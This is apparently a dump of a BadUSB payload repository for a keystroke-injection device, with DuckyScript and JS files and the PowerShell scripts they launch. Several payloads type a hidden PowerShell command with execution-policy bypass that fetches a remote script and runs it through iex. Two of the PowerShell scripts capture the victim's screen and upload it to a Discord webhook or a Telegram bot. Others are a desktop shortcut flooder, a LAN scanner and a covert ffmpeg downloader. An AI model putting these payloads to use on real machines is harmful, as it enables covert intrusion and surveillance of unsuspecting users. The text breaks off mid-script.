https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Network-Enumeration-GUI/main.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/Network-Enumeration-GUI/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Network Enumeration GUI

3 | 4 | SYNOPSIS 5 | 6 | This script creates a GUI window for enumerating devices on the local network. 7 | -------------------------------------------------------------------------------- /Fast-Execution/Network-Enumeration-GUI/main.ps1: -------------------------------------------------------------------------------- 1 | 2 | <# 3 | ====================== Mon's Network Enumeration Tool With GUI ========================== 4 | 5 | SYNOPSIS 6 | This script presents a GUI for enumerating other devices on the LAN network.. 7 | 8 | USAGE 9 | 1. Run script with powershell 10 | 2. Input ip Range and select additional parameters 11 | 3. Press "Start Scan" 12 | 13 | #> 14 | 15 | Add-Type -AssemblyName System.Windows.Forms 16 | Add-Type -AssemblyName System.Drawing 17 | Add-Type -AssemblyName Microsoft.VisualBasic 18 | [System.Windows.Forms.Application]::EnableVisualStyles() 19 | 20 | $tooltip1 = New-Object System.Windows.Forms.ToolTip 21 | $ShowHelp={ 22 | Switch ($this.name) { 23 | 24 | 25 | "start" {$tip = "Start Search"} 26 | 27 | "ipsearch" {$tip = "Define the first part of the IP here"} 28 | 29 | "startrange" {$tip = "Define the start of the IP range"} 30 | 31 | "endrange" {$tip = "Define the start of the IP range"} 32 | 33 | "hostname" {$tip = "Try to resolve each IP's hostname"} 34 | 35 | "ssh" {$tip = "Test port 22 (ssh) on each IP"} 36 | 37 | "manufact" {$tip = "Get any manufacturer details"} 38 | } 39 | $tooltip1.SetToolTip($this,$tip) 40 | } 41 | 42 | $MainWindow = New-Object System.Windows.Forms.Form 43 | $MainWindow.ClientSize = '552,535' 44 | $MainWindow.Text = "| beigetools | LAN Device Search & Enumeration |" 45 | $MainWindow.BackColor = "#242424" 46 | $MainWindow.Opacity = 0.93 47 | $MainWindow.TopMost = $false 48 | $MainWindow.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon("C:\Windows\System32\DevicePairingWizard.exe") 49 | 50 | $OutputBox = New-Object System.Windows.Forms.TextBox 51 | $OutputBox.Multiline = $True; 52 | $OutputBox.Location = New-Object System.Drawing.Size(15,180) 53 | $OutputBox.Width = 522 54 | $OutputBox.Height = 340 55 | $OutputBox.Scrollbars = "Vertical" 56 | $OutputBox.Text = "----------------------------------- RESULTS -----------------------------------" 57 | $OutputBox.Font = 'Microsoft Sans Serif,8,style=Bold' 58 | 59 | $StartScan = New-Object System.Windows.Forms.Button 60 | $StartScan.Text = "Start" 61 | $StartScan.Width = 100 62 | $StartScan.Height = 25 63 | $StartScan.Location = New-Object System.Drawing.Point(435, 33) 64 | $StartScan.Font = 'Microsoft Sans Serif,8,style=Bold' 65 | $StartScan.BackColor = "#eeeeee" 66 | $StartScan.add_MouseHover($showhelp) 67 | $StartScan.name="start" 68 | 69 | $sshboxtext = New-Object System.Windows.Forms.Label 70 | $sshboxtext.Text = "Test for SSH" 71 | $sshboxtext.ForeColor = "#bcbcbc" 72 | $sshboxtext.AutoSize = $true 73 | $sshboxtext.Width = 25 74 | $sshboxtext.Height = 10 75 | $sshboxtext.Location = New-Object System.Drawing.Point(35, 67) 76 | $sshboxtext.Font = 'Microsoft Sans Serif,8,style=Bold' 77 | 78 | $sshbox = New-Object System.Windows.Forms.CheckBox 79 | $sshbox.Width = 20 80 | $sshbox.Height = 20 81 | $sshbox.Location = New-Object System.Drawing.Point(15, 65) 82 | $sshbox.add_MouseHover($showhelp) 83 | $sshbox.name="ssh" 84 | 85 | $manufacturerboxtext = New-Object System.Windows.Forms.Label 86 | $manufacturerboxtext.Text = "Include Manufacturer" 87 | $manufacturerboxtext.ForeColor = "#bcbcbc" 88 | $manufacturerboxtext.AutoSize = $true 89 | $manufacturerboxtext.Width = 25 90 | $manufacturerboxtext.Height = 10 91 | $manufacturerboxtext.Location = New-Object System.Drawing.Point(35, 97) 92 | $manufacturerboxtext.Font = 'Microsoft Sans Serif,8,style=Bold' 93 | 94 | $manufacturerbox = New-Object System.Windows.Forms.CheckBox 95 | $manufacturerbox.Width = 20 96 | $manufacturerbox.Height = 20 97 | $manufacturerbox.Location = New-Object System.Drawing.Point(15, 95) 98 | $manufacturerbox.add_MouseHover($showhelp) 99 | $manufacturerbox.name="manufact" 100 | 101 | $hostnameboxtext = New-Object System.Windows.Forms.Label 102 | $hostnameboxtext.Text = "Include Network Hostname" 103 | $hostnameboxtext.ForeColor = "#bcbcbc" 104 | $hostnameboxtext.AutoSize = $true 105 | $hostnameboxtext.Width = 25 106 | $hostnameboxtext.Height = 10 107 | $hostnameboxtext.Location = New-Object System.Drawing.Point(35, 127) 108 | $hostnameboxtext.Font = 'Microsoft Sans Serif,8,style=Bold' 109 | 110 | $hostnamebox = New-Object System.Windows.Forms.CheckBox 111 | $hostnamebox.Width = 20 112 | $hostnamebox.Height = 20 113 | $hostnamebox.Location = New-Object System.Drawing.Point(15, 125) 114 | $hostnamebox.add_MouseHover($showhelp) 115 | $hostnamebox.name="hostname" 116 | 117 | $TextboxInputHeader = New-Object System.Windows.Forms.Label 118 | $TextboxInputHeader.Text = "Search IP Range for All Devices" 119 | $TextboxInputHeader.ForeColor = "#bcbcbc" 120 | $TextboxInputHeader.AutoSize = $true 121 | $TextboxInputHeader.Width = 25 122 | $TextboxInputHeader.Height = 10 123 | $TextboxInputHeader.Location = New-Object System.Drawing.Point(15, 15) 124 | $TextboxInputHeader.Font = 'Microsoft Sans Serif,8,style=Bold' 125 | 126 | $TextBoxInput = New-Object System.Windows.Forms.TextBox 127 | $TextBoxInput.Location = New-Object System.Drawing.Point(15, 35) 128 | $TextBoxInput.BackColor = "#eeeeee" 129 | $TextBoxInput.Width = 140 130 | $TextBoxInput.Height = 40 131 | $TextBoxInput.Text = "192.168.0." 132 | $TextBoxInput.Multiline = $false 133 | $TextBoxInput.Font = 'Microsoft Sans Serif,8,style=Bold' 134 | $TextBoxInput.add_MouseHover($showhelp) 135 | $TextBoxInput.name="ipsearch" 136 | 137 | $dashline = New-Object System.Windows.Forms.Label 138 | $dashline.Text = "-" 139 | $dashline.ForeColor = "#bcbcbc" 140 | $dashline.AutoSize = $true 141 | $dashline.Width = 25 142 | $dashline.Height = 10 143 | $dashline.Location = New-Object System.Drawing.Point(220, 35) 144 | $dashline.Font = 'Microsoft Sans Serif,9,style=Bold' 145 | 146 | $startip = New-Object System.Windows.Forms.TextBox 147 | $startip.Location = New-Object System.Drawing.Point(170, 35) 148 | $startip.BackColor = "#eeeeee" 149 | $startip.Width = 50 150 | $startip.Height = 40 151 | $startip.Text = "1" 152 | $startip.Multiline = $false 153 | $startip.Font = 'Microsoft Sans Serif,8,style=Bold' 154 | $startip.add_MouseHover($showhelp) 155 | $startip.name="startrange" 156 | 157 | $endip = New-Object System.Windows.Forms.TextBox 158 | $endip.Location = New-Object System.Drawing.Point(230, 35) 159 | $endip.BackColor = "#eeeeee" 160 | $endip.Width = 50 161 | $endip.Height = 40 162 | $endip.Text = "254" 163 | $endip.Multiline = $false 164 | $endip.Font = 'Microsoft Sans Serif,8,style=Bold' 165 | $endip.add_MouseHover($showhelp) 166 | $endip.name="endrange" 167 | 168 | #==================================================== Define GUI Elements ========================================================== 169 | 170 | $MainWindow.controls.AddRange(@($TextBoxInput, $startip, $endip, $StartScan, $sshboxtext, $sshbox, $manufacturerboxtext, $manufacturerbox, $hostnameboxtext, $hostnamebox, $OutputBox, $TextboxInputHeader, $dashline)) 171 | 172 | #==================================================== Click Functions ========================================================== 173 | 174 | $StartScan.Add_Click({ 175 | 176 | Function Add-OutputBoxLine{ 177 | Param ($outfeed) 178 | $OutputBox.AppendText("`r`n$outfeed") 179 | $OutputBox.Refresh() 180 | $OutputBox.ScrollToCaret() 181 | } 182 | Add-OutputBoxLine -Outfeed "Starting scan..." 183 | 184 | $FileOut = "$env:temp\Computers.csv" 185 | $Subnet = $TextBoxInput.Text 186 | $a=[int]$startip.text 187 | $b=[int]$endip.text 188 | 189 | $a..$b|ForEach-Object{ 190 | Start-Process -WindowStyle Hidden ping.exe -Argumentlist "-n 1 -l 0 -f -i 2 -w 100 -4 $SubNet$_" 191 | } 192 | $Computers = (arp.exe -a | Select-String "$SubNet.*dynam") -replace ' +',','| 193 | ConvertFrom-Csv -Header Computername,IPv4,MAC,x,Vendor| 194 | Select IPv4,MAC 195 | $Computers | Export-Csv $FileOut -NotypeInformation 196 | 197 | if($sshbox.Checked){ 198 | 199 | $data = Import-Csv "$env:temp\Computers.csv" 200 | $data | Add-Member -MemberType NoteProperty -Name "ssh" -Value "" 201 | $data | ForEach-Object { 202 | $ip = $_.'IPv4' 203 | try { 204 | $tcpClient = New-Object System.Net.Sockets.TcpClient 205 | $timeout = 2 * 1000 # 2 seconds timeout 206 | $asyncResult = $tcpClient.BeginConnect($ip, 22, $null, $null) 207 | $wait = $asyncResult.AsyncWaitHandle.WaitOne($timeout, $false) 208 | if ($wait) { 209 | $tcpClient.EndConnect($asyncResult) 210 | $ssh = "Yes" 211 | } else { 212 | $ssh = "No" 213 | } 214 | $tcpClient.Close() 215 | } catch { 216 | $ssh = "Closed" 217 | } 218 | $_ | Add-Member -MemberType NoteProperty -Name "ssh" -Value $ssh -force 219 | } 220 | $data | Export-Csv "$env:temp\Computers.csv" -NoTypeInformation 221 | } 222 | 223 | if($manufacturerbox.Checked){ 224 | 225 | $data = Import-Csv "$env:temp\Computers.csv" 226 | $data | Add-Member -MemberType NoteProperty -Name "manufacturer" -Value "" 227 | $data | ForEach-Object { 228 | 229 | $mac = $_.'MAC' 230 | $apiUrl = "https://api.macvendors.com/" + $mac 231 | $manufacturer = (Invoke-WebRequest -Uri $apiUrl).Content 232 | start-sleep 1 233 | $_ | Add-Member -MemberType NoteProperty -Name "manufacturer" -Value $manufacturer -force 234 | } 235 | $data | Export-Csv "$env:temp\Computers.csv" -NoTypeInformation 236 | } 237 | 238 | 239 | if($hostnamebox.Checked){ 240 | 241 | $data = Import-Csv "$env:temp\Computers.csv" 242 | $data | Add-Member -MemberType NoteProperty -Name "Hostname" -Value "" 243 | $data | ForEach-Object { 244 | try{ 245 | $ip = $_.'IPv4' 246 | $hostname = ([System.Net.Dns]::GetHostEntry($ip)).HostName 247 | $_ | Add-Member -MemberType NoteProperty -Name "Hostname" -Value $hostname -force 248 | } catch{ 249 | $_ | Add-Member -MemberType NoteProperty -Name "Hostname" -Value "Error: $($_.Exception.Message)" 250 | } 251 | } 252 | $data | Export-Csv "$env:temp\Computers.csv" -NoTypeInformation 253 | } 254 | 255 | $textfile = Get-Content "$env:temp\Computers.csv" -Raw 256 | 257 | Add-OutputBoxLine -Outfeed "$textfile" 258 | 259 | }) 260 | 261 | #===================================================== Initialize Script =================================================== 262 | 263 | $MainWindow.ShowDialog() | Out-Null 264 | exit 265 | -------------------------------------------------------------------------------- /Fast-Execution/Record-Screen-GUI/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Screen Recorder GUI

3 | 4 | SYNOPSIS 5 | 6 | A customizable gui for screen recording with ffmpeg.exe 7 | 8 | USAGE 9 | 10 | 1. Run script. 11 | 2. in GUI click 'Get ffmpeg.exe' 12 | 3. input desired variables and click start 13 | 4. Timestamped output file will be in the same folder as the script. 14 | -------------------------------------------------------------------------------- /Fast-Execution/Record-Screen-GUI/Record-Screen-GUI.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Screen Recorder GUI Tool. 2 | // Author: @beigeworm 3 | // Description: This script creates a GUI window for recording the screen to .mkv file. 4 | // Target: Windows 10 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Record-Screen-GUI/main.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); 16 | 17 | -------------------------------------------------------------------------------- /Fast-Execution/Record-Screen-GUI/Record-Screen-GUI.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Screen Recorder GUI Tool. 2 | REM Author: @beigeworm 3 | REM Description: This script creates a GUI window for recording the screen to .mkv file. 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove "-W H" to show the window) 10 | DELAY 1000 11 | GUI r 12 | DELAY 750 13 | STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Record-Screen-GUI/main.ps1 | iex 14 | ENTER 15 | 16 | 17 | -------------------------------------------------------------------------------- /Fast-Execution/Record-Screen-GUI/main.ps1: -------------------------------------------------------------------------------- 1 | $Import = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);'; 2 | add-type -name win -member $Import -namespace native; 3 | [native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0); 4 | 5 | Add-Type -AssemblyName System.Windows.Forms 6 | $form = New-Object Windows.Forms.Form 7 | $form.Text = " BeigeTools | Screen Recorder " 8 | $form.Font = 'Microsoft Sans Serif,12,style=Bold' 9 | $form.Size = New-Object Drawing.Size(350, 200) 10 | $form.StartPosition = 'Manual' 11 | $form.BackColor = [System.Drawing.Color]::Black 12 | $form.ForeColor = [System.Drawing.Color]::White 13 | $form.FormBorderStyle = [System.Windows.Forms.FormBorderStyle]::FixedDialog 14 | 15 | $Text = New-Object Windows.Forms.Label 16 | $Text.Text = "Framerate" 17 | $Text.AutoSize = $true 18 | $Text.Font = 'Microsoft Sans Serif,10' 19 | $Text.Location = New-Object System.Drawing.Point(15, 20) 20 | $fps = New-Object Windows.Forms.Label 21 | $fps.Text = "fps" 22 | $fps.AutoSize = $true 23 | $fps.Font = 'Microsoft Sans Serif,10' 24 | $fps.Location = New-Object System.Drawing.Point(60, 40) 25 | 26 | $frBox = New-Object System.Windows.Forms.TextBox 27 | $frBox.Location = New-Object System.Drawing.Point(18, 40) 28 | $frBox.BackColor = "#eeeeee" 29 | $frBox.Width = 40 30 | $frBox.Text = "25" 31 | $frBox.Multiline = $false 32 | $frBox.Font = 'Microsoft Sans Serif,8,style=Bold' 33 | 34 | $Text2 = New-Object Windows.Forms.Label 35 | $Text2.Text = "Record Time" 36 | $Text2.Font = 'Microsoft Sans Serif,10' 37 | $Text2.AutoSize = $true 38 | $Text2.Location = New-Object System.Drawing.Point(120, 20) 39 | $sec = New-Object Windows.Forms.Label 40 | $sec.Text = "s" 41 | $sec.AutoSize = $true 42 | $sec.Font = 'Microsoft Sans Serif,10' 43 | $sec.Location = New-Object System.Drawing.Point(165, 40) 44 | 45 | $tBox = New-Object System.Windows.Forms.TextBox 46 | $tBox.Location = New-Object System.Drawing.Point(123, 40) 47 | $tBox.BackColor = "#eeeeee" 48 | $tBox.Width = 40 49 | $tBox.Text = "30" 50 | $tBox.Multiline = $false 51 | $tBox.Font = 'Microsoft Sans Serif,8,style=Bold' 52 | 53 | $Text3 = New-Object Windows.Forms.Label 54 | $Text3.Text = "Offset X" 55 | $Text3.Font = 'Microsoft Sans Serif,10' 56 | $Text3.AutoSize = $true 57 | $Text3.Location = New-Object System.Drawing.Point(15, 70) 58 | $ofx = New-Object Windows.Forms.Label 59 | $ofx.Text = "px" 60 | $ofx.AutoSize = $true 61 | $ofx.Font = 'Microsoft Sans Serif,10' 62 | $ofx.Location = New-Object System.Drawing.Point(60, 90) 63 | 64 | $oxBox = New-Object System.Windows.Forms.TextBox 65 | $oxBox.Location = New-Object System.Drawing.Point(18, 90) 66 | $oxBox.BackColor = "#eeeeee" 67 | $oxBox.Width = 40 68 | $oxBox.Text = "0" 69 | $oxBox.Multiline = $false 70 | $oxBox.Font = 'Microsoft Sans Serif,8,style=Bold' 71 | 72 | $Text4 = New-Object Windows.Forms.Label 73 | $Text4.Text = "Offset Y" 74 | $Text4.Font = 'Microsoft Sans Serif,10' 75 | $Text4.AutoSize = $true 76 | $Text4.Location = New-Object System.Drawing.Point(120, 70) 77 | $ofy = New-Object Windows.Forms.Label 78 | $ofy.Text = "px" 79 | $ofy.AutoSize = $true 80 | $ofy.Font = 'Microsoft Sans Serif,10' 81 | $ofy.Location = New-Object System.Drawing.Point(165, 90) 82 | 83 | $oyBox = New-Object System.Windows.Forms.TextBox 84 | $oyBox.Location = New-Object System.Drawing.Point(123, 90) 85 | $oyBox.BackColor = "#eeeeee" 86 | $oyBox.Width = 40 87 | $oyBox.Text = "0" 88 | $oyBox.Multiline = $false 89 | $oyBox.Font = 'Microsoft Sans Serif,8,style=Bold' 90 | 91 | $Text5 = New-Object Windows.Forms.Label 92 | $Text5.Text = "Video Size" 93 | $Text5.Font = 'Microsoft Sans Serif,10' 94 | $Text5.AutoSize = $true 95 | $Text5.Location = New-Object System.Drawing.Point(15, 120) 96 | 97 | $vsBox = New-Object System.Windows.Forms.TextBox 98 | $vsBox.Location = New-Object System.Drawing.Point(18, 140) 99 | $vsBox.BackColor = "#eeeeee" 100 | $vsBox.Width = 140 101 | $vsBox.Text = "1920x1080" 102 | $vsBox.Multiline = $false 103 | $vsBox.Font = 'Microsoft Sans Serif,8,style=Bold' 104 | 105 | $Download = New-Object Windows.Forms.Button 106 | $Download.Text = "Get ffmpeg.exe" 107 | $Download.Width = 120 108 | $Download.Height = 30 109 | $Download.BackColor = [System.Drawing.Color]::White 110 | $Download.ForeColor = [System.Drawing.Color]::Black 111 | $Download.Location = New-Object System.Drawing.Point(210, 50) 112 | $Download.Font = 'Microsoft Sans Serif,10,style=Bold' 113 | 114 | $Check = New-Object Windows.Forms.Button 115 | $Check.Text = "Check Files" 116 | $Check.Width = 120 117 | $Check.Height = 30 118 | $Check.BackColor = [System.Drawing.Color]::White 119 | $Check.ForeColor = [System.Drawing.Color]::Black 120 | $Check.Location = New-Object System.Drawing.Point(210, 90) 121 | $Check.Font = 'Microsoft Sans Serif,10,style=Bold' 122 | 123 | $startrecord = New-Object Windows.Forms.Button 124 | $startrecord.Text = "Start" 125 | $startrecord.Width = 120 126 | $startrecord.Height = 30 127 | $startrecord.BackColor = [System.Drawing.Color]::White 128 | $startrecord.ForeColor = [System.Drawing.Color]::Black 129 | $startrecord.Location = New-Object System.Drawing.Point(210, 130) 130 | $startrecord.Font = 'Microsoft Sans Serif,10,style=Bold' 131 | 132 | $form.Controls.AddRange(@($Text,$fps,$frBox,$Text2,$sec,$tbox,$Text3,$ofx,$oxBox,$Text4,$ofy,$oyBox,$Text5,$vsBox,$Download,$Check,$startrecord)) 133 | 134 | 135 | $Download.Add_Click{ 136 | $Path = "$env:Temp\ffmpeg.exe" 137 | If (!(Test-Path $Path)){ 138 | $url = "https://cdn.discordapp.com/attachments/803285521908236328/1089995848223555764/ffmpeg.exe" 139 | iwr -Uri $url -OutFile $Path 140 | } 141 | } 142 | 143 | $Check.Add_Click{ 144 | $Path = "$env:Temp\ffmpeg.exe" 145 | If (!(Test-Path $Path)){msg.exe * 'Not Installed'} 146 | else {msg.exe * 'Installed'} 147 | } 148 | 149 | $startrecord.Add_Click{ 150 | $timestamp = Get-Date -Format "yyyyMMdd-HHmmss" 151 | $mkvPath = "Clip_$timestamp.mkv" 152 | 153 | if ($t.Length -eq 0){$t = 10} 154 | if ($fr.Length -eq 0){$fr = 25} 155 | if ($ox.Length -eq 0){$ox = 0} 156 | if ($oy.Length -eq 0){$oy = 0} 157 | if ($vs.Length -eq 0){$vs = "1920x1080"} 158 | 159 | .$env:Temp\ffmpeg.exe -f gdigrab -framerate $fr -t $t -offset_x $ox -offset_y $oy -video_size $vs -show_region 1 -i desktop $mkvPath 160 | } 161 | 162 | $form.ShowDialog() -------------------------------------------------------------------------------- /Fast-Execution/Screen-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Screenshot to Discord

3 | 4 | SYNOPSIS 5 | 6 | Takes a screenshot of the desktop and posts to a discord webhook. 7 | 8 | SETUP 9 | 10 | 1. replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 11 | -------------------------------------------------------------------------------- /Fast-Execution/Screen-to-Discord/Screenshot-to-Discord.js: -------------------------------------------------------------------------------- 1 | // Title: Screenshot to discord webhook 2 | // Author: @beigeworm 3 | // Description: This script takes a screenshot of the desktop and posts to a discord webhook. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_sc_to_dc | iex"); 16 | delay(500); 17 | press("ENTER"); 18 | -------------------------------------------------------------------------------- /Fast-Execution/Screen-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | $hookurl = "$dc" 2 | $seconds = 30 # Screenshot interval 3 | $a = 1 # Sceenshot amount 4 | 5 | While ($a -gt 0){ 6 | $Filett = "$env:temp\SC.png" 7 | Add-Type -AssemblyName System.Windows.Forms 8 | Add-type -AssemblyName System.Drawing 9 | $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen 10 | $Width = $Screen.Width 11 | $Height = $Screen.Height 12 | $Left = $Screen.Left 13 | $Top = $Screen.Top 14 | $bitmap = New-Object System.Drawing.Bitmap $Width, $Height 15 | $graphic = [System.Drawing.Graphics]::FromImage($bitmap) 16 | $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size) 17 | $bitmap.Save($Filett, [System.Drawing.Imaging.ImageFormat]::png) 18 | Start-Sleep 1 19 | curl.exe -F "file1=@$filett" $hookurl 20 | Start-Sleep 1 21 | Remove-Item -Path $filett 22 | Start-Sleep $seconds 23 | $a-- 24 | } 25 | -------------------------------------------------------------------------------- /Fast-Execution/Screen-to-Telegram/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Screenshot to Telegram

3 | 4 | SYNOPSIS 5 | 6 | Takes a screenshot of the desktop and posts to a Telegram bot chat. 7 | 8 | SETUP 9 | 10 | 1. replace TELEGRAM_TOKEN_HERE with your Telegram token. 11 | -------------------------------------------------------------------------------- /Fast-Execution/Screen-to-Telegram/Screenshot-to-Telegram.js: -------------------------------------------------------------------------------- 1 | 2 | REM Title: Screenshot to Telegram Bot Chat 3 | REM Author: @beigeworm 4 | REM Description: This script takes a screenshot of the desktop and posts to a Telegram Bot Chat. 5 | REM Target: Windows 10 6 | 7 | REM *SETUP* 8 | REM replace TELEGRAM_TOKEN_HERE with your Telegram Token. 9 | 10 | REM some setup for dukie script 11 | DEFAULT_DELAY 100 12 | 13 | REM open powershell (remove "-W H" to show the window) 14 | DELAY 1000 15 | GUI r 16 | DELAY 750 17 | STRING powershell -NoP -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN_HERE'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Screen-to-Telegram/main.ps1 | iex 18 | ENTER 19 | 20 | // script setup 21 | layout("us") 22 | 23 | // Open Powershell and download script 24 | delay(1000); 25 | press("GUI r"); 26 | delay(1000); 27 | type("powershell -NoP -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN_HERE'; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Screen-to-Telegram/main.ps1 | iex"); 28 | delay(500); 29 | press("ENTER"); 30 | -------------------------------------------------------------------------------- /Fast-Execution/Screen-to-Telegram/main.ps1: -------------------------------------------------------------------------------- 1 | 2 | $seconds = 30 # Screenshot interval 3 | $a = 1 # Sceenshot amount 4 | 5 | $Token = "$tg" 6 | $URL='https://api.telegram.org/bot{0}' -f $Token 7 | while($chatID.length -eq 0){ 8 | $updates = Invoke-RestMethod -Uri ($url + "/getUpdates") 9 | if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1] 10 | if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}} 11 | Sleep 10 12 | } 13 | 14 | While ($a -gt 0){ 15 | 16 | Add-Type -AssemblyName System.Windows.Forms 17 | $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen 18 | $bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height 19 | $graphics = [System.Drawing.Graphics]::FromImage($bitmap) 20 | $graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $screen.Size) 21 | $filePath = "$env:temp\sc.png" 22 | $bitmap.Save($filePath, [System.Drawing.Imaging.ImageFormat]::Png) 23 | $graphics.Dispose() 24 | $bitmap.Dispose() 25 | 26 | curl.exe -F chat_id="$ChatID" -F document=@"$filePath" "https://api.telegram.org/bot$Token/sendDocument" | Out-Null 27 | Remove-Item -Path $filePath 28 | 29 | Start-Sleep $seconds 30 | $a-- 31 | } 32 | -------------------------------------------------------------------------------- /Fast-Execution/Shortcut-Spam/Desktop-Shortcut-Spam.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Desktop Shortcut Spammer. 2 | // Author: @beigeworm 3 | // Description: This script creates 100 shortcuts on the users Desktop. 4 | // Target: Windows 10 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Shortcut-Spam/main.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); 16 | -------------------------------------------------------------------------------- /Fast-Execution/Shortcut-Spam/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Simple Shortcut Bomb

3 | 4 | 5 | SYNOPSIS 6 | 7 | This script will create 200 shortcuts on the desktop very quickly. 8 | 9 | USAGE 10 | 11 | 1. Change '100' to the number of shortcuts you want created 12 | 2. Run the script. -------------------------------------------------------------------------------- /Fast-Execution/Shortcut-Spam/main.ps1: -------------------------------------------------------------------------------- 1 | $n = 100 2 | $i = 0 3 | 4 | while($i -lt $n) 5 | { 6 | $num = Get-Random 7 | $Location = "C:\Windows\System32\rundll32.exe" 8 | $WshShell = New-Object -ComObject WScript.Shell 9 | $Shortcut = $WshShell.CreateShortcut("$Home\Desktop\USB Hardware" + $num + ".lnk") 10 | $Shortcut.TargetPath = $Location 11 | $Shortcut.Arguments ="shell32.dll,Control_RunDLL hotplug.dll" 12 | $Shortcut.IconLocation = "hotplug.dll,0" 13 | $Shortcut.Description ="Device Removal" 14 | $Shortcut.WorkingDirectory ="C:\Windows\System32" 15 | $Shortcut.Save() 16 | Start-Sleep -Milliseconds 10 17 | $i++ 18 | } 19 | -------------------------------------------------------------------------------- /Fast-Execution/Social-Search-GUI/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Social Search GUI

3 | 4 | SYNOPSIS 5 | 6 | This script presents a GUI for searching popular websites with a single username.. 7 | 8 | USAGE 9 | 10 | 1. Run script with powershell 11 | 2. Input your desired username 12 | 3. Press "Start Search" 13 | -------------------------------------------------------------------------------- /Fast-Execution/Social-Search-GUI/Username-Search-GUI.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Username Search GUI Tool. 2 | // Author: @beigeworm 3 | // Description: This script creates a GUI for searching social media and other sites with a specified Username. 4 | // Target: Windows 10 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Social-Search-GUI/main.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); 16 | -------------------------------------------------------------------------------- /Fast-Execution/Social-Search-GUI/main.ps1: -------------------------------------------------------------------------------- 1 | Add-Type -AssemblyName System.Windows.Forms 2 | Add-Type -AssemblyName System.Drawing 3 | Add-Type -AssemblyName Microsoft.VisualBasic 4 | [System.Windows.Forms.Application]::EnableVisualStyles() 5 | 6 | $MainWindow = New-Object System.Windows.Forms.Form 7 | $MainWindow.ClientSize = '690,700' 8 | $MainWindow.Text = "| Beigetools | Social Search |" 9 | $MainWindow.BackColor = "#242424" 10 | $MainWindow.Opacity = 1 11 | $MainWindow.TopMost = $true 12 | $MainWindow.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon("C:\Windows\System32\charmap.exe") 13 | 14 | $TextInput = New-Object System.Windows.Forms.TextBox 15 | $TextInput.Location = New-Object System.Drawing.Point(20, 40) 16 | $TextInput.BackColor = "#eeeeee" 17 | $TextInput.Width = 370 18 | $TextInput.Height = 40 19 | $TextInput.Font = 'Microsoft Sans Serif,12,style=Bold' 20 | $TextInput.add_MouseHover($showhelp) 21 | $TextInput.name="input" 22 | 23 | $TextInputHeader = New-Object System.Windows.Forms.Label 24 | $TextInputHeader.Text = "Username" 25 | $TextInputHeader.ForeColor = "#bcbcbc" 26 | $TextInputHeader.AutoSize = $true 27 | $TextInputHeader.Width = 25 28 | $TextInputHeader.Height = 10 29 | $TextInputHeader.Location = New-Object System.Drawing.Point(20, 20) 30 | $TextInputHeader.Font = 'Microsoft Sans Serif,10,style=Bold' 31 | 32 | $OutputBoxHeader = New-Object System.Windows.Forms.Label 33 | $OutputBoxHeader.Text = "Results" 34 | $OutputBoxHeader.ForeColor = "#bcbcbc" 35 | $OutputBoxHeader.AutoSize = $true 36 | $OutputBoxHeader.Width = 25 37 | $OutputBoxHeader.Height = 10 38 | $OutputBoxHeader.Location = New-Object System.Drawing.Point(20, 90) 39 | $OutputBoxHeader.Font = 'Microsoft Sans Serif,10,style=Bold' 40 | 41 | $OutputBox = New-Object System.Windows.Forms.TextBox 42 | 